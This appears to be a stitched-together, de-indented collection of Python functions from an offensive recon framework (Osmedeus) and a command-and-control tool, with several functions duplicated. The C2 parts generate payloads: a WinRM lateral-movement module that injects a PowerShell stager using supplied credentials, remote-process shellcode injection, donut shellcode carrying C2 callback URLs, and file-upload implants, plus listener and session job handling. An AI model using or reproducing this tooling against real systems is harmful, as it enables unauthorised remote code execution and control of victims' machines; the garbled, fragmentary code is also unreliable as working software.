def __init__(self, options):
utils.print_banner("IP Discovery")
utils.make_directory(options['WORKSPACE'] + '/ipspace')
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info("It's already done. use '-f' options to force rerun the module")
return
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start IP Discovery for {0}'.format(self.options['TARGET'])
})
self.initial()
utils.just_waiting(self.options, self.module_name)
try:
self.conclude()
except:
utils.print_bad("Something wrong with conclude for {0}".format(self.module_name))
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name),
'content': 'Done IP Discovery for {0}'.format(self.options['TARGET'])
})
def payload(self):
stager = ipc_server.publish_event(events.GET_STAGERS, ('powershell', ))
listener = ipc_server.publish_event(
events.GET_LISTENERS, (self.options['Listener']['Value'], ))
if stager and listener:
stager.options['AsFunction']['Value'] = False
with open('core/teamserver/modules/boo/src/winrm.boo',
'r') as module_src:
guid, psk, stage = stager.generate(listener)
ipc_server.publish_event(events.SESSION_REGISTER, (guid, psk))
src = module_src.read()
src = src.replace('TARGET', self.options['Host']['Value'])
src = src.replace('USERNAME',
self.options['Username']['Value'])
src = src.replace('DOMAIN', self.options['Domain']['Value'])
src = src.replace('PASSWORD',
self.options['Password']['Value'])
src = src.replace(
'TRUSTED_HOSTS',
str(self.options['AddToTrustedHosts']['Value']).lower())
src = src.replace('PAYLOAD', f'`{stage}`')
return src
print_bad('Invalid listener selected')
def initial(self):
if self.observatory():
utils.just_waiting(self.options, self.module_name)
try:
self.conclude()
except:
utils.print_bad("Something wrong with conclude for {0}".format(self.module_name))
def full_report(options):
global headers
try:
workspace = utils.get_workspace(options=options)
url = options['REMOTE_API'] + "/api/{0}/activities".format(workspace)
r = sender(url, headers=headers, data={}, method='GET')
if r:
raw_reports = r.json()
except Exception:
log_path = Path(options.get('WORKSPACE')).joinpath('log.json')
raw_reports = utils.reading_json(log_path)
if not raw_reports:
utils.print_bad("Can't get log file for {0} workspace".format(
options.get('TARGET')))
return None
modules = list(raw_reports.keys())
for module in modules:
if check_module(options, module):
reports = raw_reports.get(module)
utils.print_banner(module)
for report in reports:
cmd = report.get('cmd')
utils.print_info("Command Executed: {0}\n".format(cmd))
output_path = report.get('output_path')
std_path = report.get('std_path')
if 'raw' in options.get('REPORT').lower():
read_report(std_path)
elif 'full' in options.get('REPORT').lower():
read_report(output_path)
utils.print_line()
def summary_report(options):
global headers
workspace = utils.get_workspace(options=options)
try:
url = options['REMOTE_API'] + "/api/workspace/{0}".format(workspace)
r = sender(url, headers=headers, data={}, method='GET')
if r:
main_json = r.json()
except Exception:
main_json_path = Path(options.get('WORKSPACE')).joinpath(
'{0}.json'.format(workspace))
main_json = utils.reading_json(main_json_path)
if not main_json:
utils.print_bad("Can't get log file for {0} workspace".format(
options.get('TARGET')))
return None
subdomains = main_json.get('Subdomains')
head = ['Domain', 'IP', 'Technologies', 'Ports']
contents = []
for element in subdomains:
item = [
element.get('Domain'),
element.get('IP'),
"\n".join(element.get('Technology')),
",".join(element.get('Ports')),
]
contents.append(item)
print(tabulate(contents, head, tablefmt="grid"))
def payload(self):
shellcode_path = os.path.expanduser(self.options['Shellcode']['Value'])
if os.path.exists(shellcode_path):
with open(shellcode_path, 'rb') as shellcode:
if self.options['InjectionMethod']['Value'] == 'InjectRemote':
with open('modules/boo/src/injectremote.boo',
'r') as module_src:
shellcode = ','.join(
list(map(str, to_byte_array(shellcode.read()))))
src = module_src.read()
src = src.replace('BYTES', shellcode)
src = src.replace('PROCESS',
self.options['Process']['Value'])
return src
elif self.options['InjectionMethod'][
'Value'] == 'QueueUserAPC':
raise NotImplemented
elif self.options['InjectionMethod']['Value'] == 'InjectSelf':
raise NotImplemented
print_bad("Path to shellcode invalid")
def run(command):
stdout = ''
try:
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# Poll process for new output until finished
while True:
nextline = process.stdout.readline().decode('utf-8')
# store output to log file
if nextline == '' and process.poll() is not None:
break
print(nextline, end='')
stdout += nextline
sys.stdout.flush()
exitCode = process.returncode
if (exitCode == 0):
return stdout
else:
utils.print_line()
print('Something went wrong with the command below: ')
print(command)
utils.print_line()
return None
except:
utils.print_line()
utils.print_bad('Something went wrong with the command below: ')
print(command)
utils.print_line()
return None
def sending(self, url):
r = sender.send_get(self.options, url, cookies=None)
results = []
if r:
response = r.text
if 'class="errormsg"' in response:
utils.print_bad("No entry found for: {0}".format(self.query))
return
soup = utils.soup(response)
result = self.analyze(soup)
if not result:
return False
# checking if we have more than one pages
pages = self.check_pages(soup)
if pages:
utils.print_info("Detect pages {0} for query".format(str(len(pages))))
for page in pages:
page_url = self.baseURL + page
r1 = sender.send_get(self.options, page_url, cookies=None)
if r1:
response1 = r1.text
soup1 = utils.soup(response1)
self.analyze(soup1)
results.extend(result)
return results
def specific(options, module):
module = module.lower()
# checking the tool is installed right or not and exit
if 'health' in module:
health = healcheck.Healcheck(options)
if health.checking():
utils.print_good("All things look fine")
else:
utils.print_bad("Installing Osmedeus not correctly done")
utils.just_shutdown_flask(options)
sys.exit(0)
initials.Initials(options)
if 'sub' in module or 'subdomain' in module:
subdomain.SubdomainScanning(options)
takeover.TakeOverScanning(options)
screenshot.ScreenShot(options)
cors.CorsScan(options)
recon.Recon(options)
assetfinding.AssetFinding(options)
if 'ip' in module:
# Discovery IP space
ipspace.IPSpace(options)
if 'screen' in module:
# Discovery IP space
screenshot.ScreenShot(options)
if 'portscan' in module:
# scanning port, service and vuln with masscan and nmap
portscan.PortScan(options)
if 'headers' in module:
headers.HeadersScan(options)
if 'asset' in module:
assetfinding.AssetFinding(options)
if 'vuln' in module:
# scanning vulnerable service based on version
vulnscan.VulnScan(options)
if 'dir' in module:
# run blind directory brute force directly
dirbrute.DirBrute(options)
if 'brute' in module or 'force' in module:
# running brute force things based on scanning result
brutethings.BruteThings(options)
if 'git' in module:
gitscan.GitScan(options)
# if 'burp' in module:
# burpstate.BurpState(options)
conclusion.Conclusion(options)
def initial(self):
if self.observatory():
utils.just_waiting(self.options, self.module_name)
try:
self.conclude()
except:
utils.print_bad("Something wrong with conclude for {0}".format(self.module_name))
def parsing_argument(args):
if not args.client:
p = Process(target=flask_run)
p.start()
#parsing agument
if args.config:
config_path = args.config
options = config.parsing_config(config_path, args)
#wait for flask API start
time.sleep(2)
try:
utils.set_config(options)
options['JWT'] = utils.get_jwt(options)
except:
utils.print_bad("Fail to set config, Please check Flask API !!!")
sys.exit(-1)
if options['TARGET_LIST'] != "None":
#check if target list file exist and loop throught the target
if os.path.exists(options['TARGET_LIST']):
with open(options['TARGET_LIST'], 'r+') as ts:
targetlist = ts.read().splitlines()
for target in targetlist:
options['TARGET'] = target
single_target(options)
print(
"{2}>++('> >++('{1}>{2} Target done: {0} {1}<{2}')++< <')++<"
.format(options['TARGET'], P, G))
else:
single_target(options)
def single_target(options):
try:
utils.set_config(options)
options['JWT'] = utils.get_jwt(options)
except:
utils.print_bad(
"Fail to set config, Something went wrong with Flask API !")
utils.print_info(
"Visit this page for common issue: https://github.com/j3ssie/Osmedeus/wiki/Common-Issues"
)
sys.exit(-1)
if not (options['JWT'] and options['JWT'] != "None"):
utils.print_bad("Can't login to get JWT")
sys.exit(-1)
utils.print_target(options.get('TARGET'))
# just disable slack noti in debug mode
if options['DEBUG'] != "True":
slack.slack_seperate(options)
# run specific task otherwise run the normal routine
if options['MODULE'] != "None":
module = options['MODULE']
routine.specific(options, module)
else:
if options['DEBUG'] == "True":
routine.debug(options)
else:
routine.normal(options)
def payload(self):
listener = ipc_server.publish_event(
events.GET_LISTENERS, (self.options['Listener']['Value'], ))
if listener:
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
guid = uuid.uuid4()
psk = gen_stager_psk()
ipc_server.publish_event(events.SESSION_REGISTER, (guid, psk))
donut_shellcode = donut.create(
file='./core/teamserver/data/naga.exe',
params=f"{guid};{psk};{c2_urls}",
arch=2
if self.options['Architecture']['Value'] == 'x64' else 1)
shellcode = shellcode_to_int_byte_array(donut_shellcode)
#if self.options['InjectionMethod']['Value'] == 'InjectRemote':
with open('core/teamserver/modules/boo/src/injectremote.boo',
'r') as module_src:
src = module_src.read()
src = src.replace('BYTES', shellcode)
src = src.replace('PROCESS', self.options['Process']['Value'])
return src
else:
print_bad(
f"Listener '{self.options['Listener']['Value']}' not found!")
def __init__(self, options):
utils.print_banner("IP Discovery")
utils.make_directory(options['WORKSPACE'] + '/ipspace')
self.module_name = self.__class__.__name__
self.options = options
slack.slack_noti(
'status',
self.options,
mess={
'title':
"{0} | {1}".format(self.options['TARGET'], self.module_name),
'content':
'Start IP Discovery for {0}'.format(self.options['TARGET'])
})
self.initial()
utils.just_waiting(self.module_name)
try:
self.conclude()
except:
utils.print_bad("Something wrong with conclude for {0}".format(
self.module_name))
slack.slack_noti(
'good',
self.options,
mess={
'title':
"{0} | {1} ".format(self.options['TARGET'], self.module_name),
'content':
'Done IP Discovery for {0}'.format(self.options['TARGET'])
})
def source_parsing(options):
# search on specific search engine which is default routine
if 'custom' in options.get('module'):
if options.get('query_list'):
queris = utils.just_read(options.get('query_list')).splitlines()
for query in queris:
options['query'] = query
single_query(options)
# query by multi source
elif options.get('source_list'):
query_by_source = utils.get_json(utils.just_read(options.get('source_list')))
if type(query_by_source) == dict:
for key, value in query_by_source.items():
options['source'] = key
options['query'] = value
single_query(options)
else:
utils.print_bad("Look like your Source file not correct the pattern")
else:
single_query(options)
# search for exploit
if 'exploit' in options.get('module'):
if options.get('target_list'):
targets = utils.just_read(options.get('target_list')).splitlines()
for query in targets:
options['query'] = query
single_query(options)
else:
module_query(options)
def short_report(options):
global headers
workspace = utils.get_workspace(options=options)
try:
url = options['REMOTE_API'] + "/api/module/{0}".format(workspace)
r = sender(url, headers=headers, data={}, method='GET')
if r:
raw_reports = r.json().get('reports', None)
except Exception:
raw_reports = None
if not raw_reports:
raw_reports = local_get_report(options).get('reports')
if not raw_reports:
utils.print_bad("Can't get log file for {0} workspace".format(
options.get('TARGET')))
return None
# only print out the path
if options.get('REPORT') == 'path':
path_report(options, raw_reports)
return None
for item in raw_reports:
for report in item.get('reports'):
report_path = os.path.join(options.get('WORKSPACES'),
report.get('path'))
utils.print_info(item.get('module') + ": " + report_path)
# checking if get specific module or not
if check_module(options, item.get('module')):
read_report(report_path)
elif options.get('MODULE') == "None":
read_report(report_path)
utils.print_line()
def do_login(self):
username, password = utils.get_cred(self.options, source='github')
g = Github(username, password)
try:
_ = g.get_emojis()
return g
except:
utils.print_bad(f"Login fail as {username}")
return False
def save(self, *args, **kwargs):
if self.domain is None:
self.domain = self.ip_address
# prevent duplicate analyzed command
raw_check = str(self.domain) + str(self.workspace)
self.checksum = utils.gen_checksum(raw_check)
try:
super(Summaries, self).save(*args, **kwargs)
except Exception:
utils.print_bad("Duplicate Summaries Record")
def initial(self):
self.create_ip_result()
self.masscan()
masscan_xml = utils.replace_argument(
self.options, '$WORKSPACE/portscan/$OUTPUT-masscan.xml')
# checking output of masscan is empty or not because usually your bandwidth will not enough to scan large input
if utils.not_empty_file(masscan_xml):
self.create_html()
else:
utils.print_bad('Masscan output empty')
vulnscan.VulnScan(self.options)
def asnlookup(self, company):
utils.print_banner(f"Starting scraping {company} from asnlookup.com")
url = f'http://asnlookup.com/api/lookup?org={company}'
r = sender.send_get(self.options, url, None)
data = r.json()
if not data:
utils.print_bad('No IP found')
else:
content = "\n".join(data)
print(content)
utils.just_write(self.options['output'], content)
utils.just_cleanup(self.options['output'])
def initial(self):
if self.options['version'] == '':
utils.print_bad("Vulners module need to provided version")
return
data = {
"software":
"cpe:/a:{0}:{0}".format(self.options['product'].lower()),
"version": self.options['version'].lower(),
"type": "cpe"
}
self.sending(data)
def save(self, *args, **kwargs):
# prevent duplicate analyzed command
raw_check = str(self.cmd) + \
str(self.output_path) + str(self.std_path) + \
str(self.alias) + str(self.cmd_type) + \
str(self.mode) + str(self.pre_run) + \
str(self.resources) + str(self.speed)
self.checksum = utils.gen_checksum(raw_check)
try:
super(Commands, self).save(*args, **kwargs)
except Exception:
utils.print_bad("Duplicate Commands")
def __init__(self, options):
utils.print_banner("Scanning Subdomain")
utils.make_directory(options['env']['WORKSPACE'] + '/subdomain')
self.options = options
self.initial()
#check if the screenshot success or not, if not run it again
while True:
if os.stat(utils.replace_argument(self.options, '$WORKSPACE/subdomain/final-$OUTPUT.txt')).st_size == 0:
utils.print_bad('Something wrong with these module ... run it again')
self.initial()
else:
break
def start(self):
"""
Start the selected listener
Usage: start [-h]
"""
try:
self.selected.start()
self.listeners.append(self.selected)
print_good(f"Listener '{self.selected['Name']}' started successfully!")
state.LISTENERS = len(self.listeners)
except Exception as e:
print_bad(f"Error starting listener '{self.selected['Name']}': {e}")
def add_job(self, job_tuple):
if self.sessions and not len(self.sessions):
return
guid, job = job_tuple
if self.sessions and guid.lower() == 'all':
for session in self.sessions:
session.add_job(job)
else:
try:
session = self.get(guid)
session.add_job(job)
except IndexError:
print_bad("No session was found with name: {}".format(guid))
def start(self):
"""
Start the selected listener
Usage: start [-h]
"""
try:
self.selected.start()
self.listeners.append(self.selected)
print_good(f"Listener '{self.selected['Name']}' started successfully!")
state.LISTENERS = len(self.listeners)
except Exception as e:
print_bad(f"Error starting listener '{self.selected['Name']}': {e}")
def proxy_parsing(options):
# return if proxy config file found
if options['PROXY_FILE'] != "None":
proxy_file = options['PROXY_FILE']
utils.print_info("Detected proxychains file: {0}".format(proxy_file))
return
elif options['PROXY'] != "None":
proxy_file = options['CWD'] + '/core/proxychains.conf'
utils.print_info("Detected proxychains file: {0}".format(proxy_file))
if options['PROXY'] != "None":
proxy_parsed = urllib.parse.urlsplit(options['PROXY'])
scheme = proxy_parsed.scheme
host = proxy_parsed.netloc.split(':')[0]
port = proxy_parsed.netloc.split(':')[1]
proxy_element = "\n" + scheme + " " + host + " " + port
raw_data = utils.just_read(proxy_file).splitlines()
for i in range(len(raw_data)):
if '[ProxyList]' in raw_data[i]:
init_part = raw_data[:i]
proxy_part = raw_data[i:]
# check if this proxy is exist or not
check_duplicate = False
for item in proxy_part:
if proxy_element.strip() in item.strip():
check_duplicate = True
if not check_duplicate:
proxy_part.append(proxy_element)
real_proxy_data = "\n".join(init_part + proxy_part)
utils.just_write(proxy_file, real_proxy_data)
if options['PROXY'] != "None" or options['PROXY_FILE'] != "None":
if not shutil.which(options['PROXY_CMD'].split(' ')[0]):
utils.print_bad("Look like proxy mode doesn't support your OS")
sys.exit(0)
else:
#simple check for proxy is good
utils.print_info("Testing proxy with simple curl command")
if execute.run(options['PROXY_CMD'] +
" curl -s ipinfo.io/ip") == execute.run(
"curl -s ipinfo.io/ip"):
utils.print_bad("Look like your proxy not work properly")
sys.exit(0)
def get_num_pages(self, json_response):
# check if query have result
if not json_response.get('total'):
utils.print_bad("Look like your query have no results")
return False
results_total = int(json_response.get('total'))
pageSize = int(json_response.get('pageSize'))
page_num = str(int(results_total / pageSize))
utils.print_good("Detect posible {0} pages per {1} result".format(
page_num, str(results_total)))
if int(page_num) > 0:
return page_num
return False
def single_query(options):
utils.print_debug(options, options)
utils.print_info("Query: {0}".format(options.get('query')))
if not options.get('source'):
utils.print_bad("You need to specify Search engine")
return
if 'fofa' in options.get('source'):
fofa.Fofa(options)
if 'shodan' in options.get('source'):
shodan.Shodan(options)
if 'censys' in options.get('source'):
censys.Censys(options)
def proxy_parsing(options):
# return if proxy config file found
if options['PROXY_FILE'] != "None":
proxy_file = options['PROXY_FILE']
utils.print_info("Detected proxychains file: {0}".format(proxy_file))
return
elif options['PROXY'] != "None":
proxy_file = options['CWD'] + '/core/proxychains.conf'
utils.print_info("Detected proxychains file: {0}".format(proxy_file))
if options['PROXY'] != "None":
proxy_parsed = urllib.parse.urlsplit(options['PROXY'])
scheme = proxy_parsed.scheme
host = proxy_parsed.netloc.split(':')[0]
port = proxy_parsed.netloc.split(':')[1]
proxy_element = "\n" + scheme + " " + host + " " + port
raw_data = utils.just_read(proxy_file).splitlines()
for i in range(len(raw_data)):
if '[ProxyList]' in raw_data[i]:
init_part = raw_data[:i]
proxy_part = raw_data[i:]
# check if this proxy is exist or not
check_duplicate = False
for item in proxy_part:
if proxy_element.strip() in item.strip():
check_duplicate = True
if not check_duplicate:
proxy_part.append(proxy_element)
real_proxy_data = "\n".join(init_part + proxy_part)
utils.just_write(proxy_file, real_proxy_data)
if options['PROXY'] != "None" or options['PROXY_FILE'] != "None":
if not shutil.which(options['PROXY_CMD'].split(' ')[0]):
utils.print_bad("Look like proxy mode doesn't support your OS")
sys.exit(0)
else:
#simple check for proxy is good
utils.print_info("Testing proxy with simple curl command")
if execute.run(options['PROXY_CMD'] + " curl -s ipinfo.io/ip") == execute.run("curl -s ipinfo.io/ip"):
utils.print_bad("Look like your proxy not work properly")
sys.exit(0)
def generate(self, listener_name: str):
"""
Generate the selected stager
Usage: generate <listener_name> [-h]
Arguments:
listener_name listener name
"""
if self.selected:
for l in self.prompt_session.contexts[0].listeners:
if l['Name'] == listener_name.lower():
self.selected.generate(l)
else:
print_bad("No stager selected")
def set(self, name: str, value: str):
"""
Set options on the selected module
Usage: set <name> <value> [-h]
Arguments:
name option name
value option value
"""
if self.selected:
try:
self.selected.options[name]['Value'] = value
except KeyError:
print_bad(f"Unknown option '{name}'")
def set(self, name: str, value: str):
"""
Set options on the selected stager
Usage: set <name> <value> [-h]
Arguments:
name option name
value option value
"""
if self.selected:
try:
self.selected.options[name]['Value'] = value
except KeyError:
print_bad(f"Unknown option '{name}'")
def command_check(self):
# base command
commands = [
"masscan -h", "nmap -h", "git -h", "git -h", "csvlook -h",
"npm -h", "wfuzz -h", "$PLUGINS_PATH/dirsearch/dirsearch.py -h"
"$PLUGINS_PATH/massdns/bin/massdns -h"
"$PLUGINS_PATH/IPOsint/ip-osint.py -h"
]
for c in commands:
command = utils.replace_argument(self.options, c)
if not self.installed(cmd=command):
utils.print_bad("Bad -- " + command)
self.healthcheck = False
else:
utils.print_good("Good -- " + command)
def generate(self, listener_name: str):
"""
Generate the selected stager
Usage: generate <listener_name> [-h]
Arguments:
listener_name listener name
"""
if self.selected:
for l in self.prompt_session.contexts[0].listeners:
if l['Name'] == listener_name.lower():
self.selected.generate(l)
else:
print_bad("No stager selected")
def use(self, name: str):
"""
Select the specified listener
Usage: use <name> [-h]
Arguments:
name module name
"""
for m in self.loaded:
if m.name == name.lower():
self.selected = m
self.prompt_session.message = self.prompt = HTML(f"ST (<ansired>modules</ansired>)(<ansired>{m.name}</ansired>) ≫ ")
return
print_bad(f"No module named '{name}'")
def parse_result(self, result):
if len(result):
if not self.switched_context(result):
command = split(result)
try:
logging.debug(f"command: {command[0]} args: {command[1:]} ctx: {self.current_context.name}")
bound_cmd_handler = functools.partial(getattr(self.current_context, command[0]), args=command[1:])
run_in_terminal(bound_cmd_handler)
except AttributeError:
print_bad(f"Unknown command '{command[0]}'")
if args['--debug']:
traceback.print_exc()
except DocoptExit as e:
print(str(e))
except SystemExit:
pass
def parse_result(self, result):
if len(result):
if not self.switched_context(result):
command = split(result)
try:
logging.debug(f"command: {command[0]} args: {command[1:]} ctx: {self.current_context.name}")
bound_cmd_handler = functools.partial(getattr(self.current_context, command[0]), args=command[1:])
run_in_terminal(bound_cmd_handler)
except AttributeError:
print_bad(f"Unknown command '{command[0]}'")
if args['--debug']:
traceback.print_exc()
except DocoptExit as e:
print(str(e))
except SystemExit:
pass
def payload(self):
if self.options['File']['Value'] is None:
return None
if not os.path.exists(self.options['File']['Value']):
from core.utils import print_bad
print_bad("Selected file do not exists.")
return None
with open(self.options['File']['Value'], "rb") as file:
encoded_string = base64.b64encode(file.read()).decode("utf-8")
with open('modules/ipy/src/uploader.py', 'r') as module_src:
src = module_src.read()
src = src.replace("FILENAME", os.path.basename(self.options['File']['Value']))
src = src.replace("DESTINATION", self.options['Destination']['Value'])
src = src.replace("DATA", encoded_string)
return src
def options(self):
"""
Show selected stager options
Usage: options [-h]
"""
if self.selected:
table_data = [
["Option Name", "Required", "Value", "Description"]
]
for k, v in self.selected.options.items():
table_data.append([k, v["Required"], v["Value"], v["Description"]])
table = AsciiTable(table_data)
table.inner_row_border = True
print(table.table)
else:
print_bad("No stager selected")
def payload(self):
stager = ipc_server.publish(events.GET_STAGERS, 'powershell')
listener = ipc_server.publish(events.GET_LISTENERS, self.options['Listener']['Value'])
if stager and listener:
stager.options['AsFunction']['Value'] = False
with open('modules/boo/src/winrm.boo', 'r') as module_src:
stage = stager.generate(listener, as_string=True)
stage = stage.replace("$", "\\$")
src = module_src.read()
src = src.replace('TARGET', self.options['Host']['Value'])
src = src.replace('USERNAME', self.options['Username']['Value'])
src = src.replace('DOMAIN', self.options['Domain']['Value'])
src = src.replace('PASSWORD', self.options['Password']['Value'])
src = src.replace('TRUSTED_HOSTS', str(self.options['AddToTrustedHosts']['Value']).lower())
src = src.replace('PAYLOAD', stage)
return src
print_bad('Invalid listener selected')
def parsing_argument(args):
if not args.client:
p = Process(target=flask_run)
p.start()
#parsing agument
if args.config:
config_path = args.config
options = config.parsing_config(config_path, args)
#wait for flask API start
time.sleep(2)
try:
utils.set_config(options)
options['JWT'] = utils.get_jwt(options)
except:
utils.print_bad("Fail to set config, Something went from with Flask API !!!")
utils.print_bad(
"Visit this page for common issue: https://github.com/j3ssie/Osmedeus/wiki/Common-Issues")
sys.exit(-1)
if options['TARGET_LIST'] != "None":
#check if target list file exist and loop throught the target
if os.path.exists(options['TARGET_LIST']):
with open(options['TARGET_LIST'], 'r+') as ts:
targetlist = ts.read().splitlines()
for target in targetlist:
options['TARGET'] = target
single_target(options)
print(
"{2}>++('> >++('{1}>{2} Target done: {0} {1}<{2}')++< <')++<".format(options['TARGET'], P, G))
else:
single_target(options)
parser.add_argument("port", help="Bind Port", type=int)
parser.add_argument("--ip", dest='ip', help="Bind IP address", type=str, required=False)
parser.add_argument("--file", dest='file', help="Filename", type=str, required=False)
args = parser.parse_args()
stager = validate_stager(args.stager)
stager_file = None
resource_file = stager.name
if args.file is not None:
resource_file = args.file
stager_file = args.file
if stager is None:
print_bad("ERROR: Invalid stager.")
sys.exit(1)
listener = generate_listener(args.ip, args.port)
listener = validate_listener(listener)
if listener is None:
print_bad("ERROR: Invalid listener.")
sys.exit(1)
stager.generate(listener, stager_file)
generate_resource_file(resource_file, listener)
sys.exit(0)
def parsing_config(config_path, args):
options = {}
##some default path
github_api_key = str(os.getenv("GITROB_ACCESS_TOKEN"))
cwd = str(os.getcwd())
#just hardcode if gopath not loaded
go_path = cwd + "/plugins/go"
# go_path = str(os.getenv("GOPATH")) + "/bin"
# if "None" in go_path:
# go_path = cwd + "/plugins/go"
bot_token = str(os.getenv("SLACK_BOT_TOKEN"))
log_channel = str(os.getenv("LOG_CHANNEL"))
status_channel = str(os.getenv("STATUS_CHANNEL"))
report_channel = str(os.getenv("REPORT_CHANNEL"))
stds_channel = str(os.getenv("STDS_CHANNEL"))
verbose_report_channel = str(os.getenv("VERBOSE_REPORT_CHANNEL"))
if os.path.isfile(config_path):
utils.print_info('Config file detected: {0}'.format(config_path))
#config to logging some output
config = ConfigParser(interpolation=ExtendedInterpolation())
config.read(config_path)
else:
utils.print_info('New config file created: {0}'.format(config_path))
shutil.copyfile(cwd + '/template-config.conf', config_path)
config = ConfigParser(interpolation=ExtendedInterpolation())
config.read(config_path)
workspace = cwd + "/workspaces/"
config.set('Enviroments', 'cwd', cwd)
config.set('Enviroments', 'go_path', go_path)
config.set('Enviroments', 'github_api_key', github_api_key)
config.set('Enviroments', 'workspaces', str(workspace))
if args.debug:
config.set('Slack', 'bot_token', 'bot_token')
config.set('Slack', 'log_channel', 'log_channel')
config.set('Slack', 'status_channel', 'status_channel')
config.set('Slack', 'report_channel', 'report_channel')
config.set('Slack', 'stds_channel', 'stds_channel')
config.set('Slack', 'verbose_report_channel', 'verbose_report_channel')
else:
config.set('Slack', 'bot_token', bot_token)
config.set('Slack', 'log_channel', log_channel)
config.set('Slack', 'status_channel', status_channel)
config.set('Slack', 'report_channel', report_channel)
config.set('Slack', 'stds_channel', stds_channel)
config.set('Slack', 'verbose_report_channel', verbose_report_channel)
##config of the tool
if args.slow:
speed = "slow"
else:
speed = "quick"
module = str(args.module)
debug = str(args.debug)
force = str(args.force)
config.set('Mode', 'speed', speed)
config.set('Mode', 'module', module)
config.set('Mode', 'debug', debug)
config.set('Mode', 'force', force)
##target stuff
#parsing agument
git_target = args.git if args.git else None
burpstate_target = args.burp if args.burp else None
target_list = args.targetlist if args.targetlist else None
company = args.company if args.company else None
direct_input = args.input if args.input else None
if args.target:
target = args.target
output = args.output if args.output else args.target
company = args.company if args.company else args.target
strip_target = target.replace('https://', '').replace('http://', '')
if '/' in strip_target:
strip_target = strip_target.split('/')[0]
if args.workspace:
if args.workspace[-1] == '/':
workspace = args.workspace + options['env']['STRIP_TARGET']
else:
workspace = args.workspace + '/' + options['env']['STRIP_TARGET']
else:
workspace += strip_target
if not direct_input:
try:
ip = socket.gethostbyname(strip_target)
except:
ip = "None"
utils.print_bad("Something wrong to connect to {0}".format(target))
else:
ip = None
try:
#getting proxy from args
proxy = args.proxy if args.proxy else None
proxy_file = args.proxy_file if args.proxy_file else None
config.set('Proxy', 'proxy', str(proxy))
config.set('Proxy', 'proxy_file', str(proxy_file))
if config['Proxy']['proxy_cmd'] == 'None':
#only works for Kali proxychains, change it if you on other OS
proxy_cmd = "proxychains -f {0}".format(proxy_file)
config.set('Proxy', 'proxy_cmd', str(proxy_cmd))
except:
utils.print_info("Your config file seem to be outdated, Backup it and delete it to regenerate the new one")
config.set('Target', 'input', str(direct_input))
config.set('Target', 'git_target', str(git_target))
config.set('Target', 'burpstate_target', str(burpstate_target))
config.set('Target', 'target_list', str(target_list))
config.set('Target', 'output', str(output))
config.set('Target', 'target', str(target))
config.set('Target', 'strip_target', str(strip_target))
config.set('Target', 'company', str(company))
config.set('Target', 'ip', str(ip))
config.set('Enviroments', 'workspace', str(workspace))
#create workspace folder for the target
utils.make_directory(workspace)
#set the remote API
if args.remote:
remote_api = args.remote
config.set('Server', 'remote_api', remote_api)
#set credentials as you define from agurments
if args.auth:
#user:pass
creds = args.auth.strip().split(":")
username = creds[0]
password = creds[1]
config.set('Server', 'username', username)
config.set('Server', 'password', password)
else:
#set random password if default password detect
if config['Server']['password'] == 'super_secret':
new_pass = ''.join(random.choice(string.ascii_lowercase)
for i in range(6)).upper()
config.set('Server', 'password', new_pass)
#save the config
with open(config_path, 'w') as configfile:
config.write(configfile)
config = ConfigParser(interpolation=ExtendedInterpolation())
config.read(config_path)
sections = config.sections()
for sec in sections:
for key in config[sec]:
options[key.upper()] = config.get(sec, key)
######
#parsing proxy stuff
if options.get('PROXY') or options.get('PROXY_FILE'):
proxy_parsing(options)
else:
#just for the old config
options['PROXY'] = "None"
options['PROXY_FILE'] = "None"
return options